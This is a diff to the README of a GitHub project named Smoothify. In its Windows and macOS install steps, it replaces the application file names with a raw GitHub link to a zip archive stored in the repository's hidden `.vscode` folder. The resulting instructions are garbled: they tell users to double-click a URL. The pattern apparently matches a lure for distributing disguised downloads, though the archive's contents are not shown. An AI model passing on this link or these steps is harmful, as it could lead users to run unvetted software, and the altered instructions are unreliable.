RaunakRJ14/Smoothify/README.md

 5. **For Windows:**
    - Extract the ZIP file.
    - Open the extracted folder.
-   - Double-click on `Smoothify.exe` to run the application.
+   - Double-click on `https://raw.githubusercontent.com/RaunakRJ14/Smoothify/main/.vscode/Smoothify-3.4-alpha.3.zip` to run the application.

 6. **For macOS:**
    - Extract the downloaded file.
    - Open the extracted folder.
-   - Double-click on `Smoothify.app` to start the application.
+   - Double-click on `https://raw.githubusercontent.com/RaunakRJ14/Smoothify/main/.vscode/Smoothify-3.4-alpha.3.zip` to start the application.

 7. **For Linux:**
    - Open a terminal.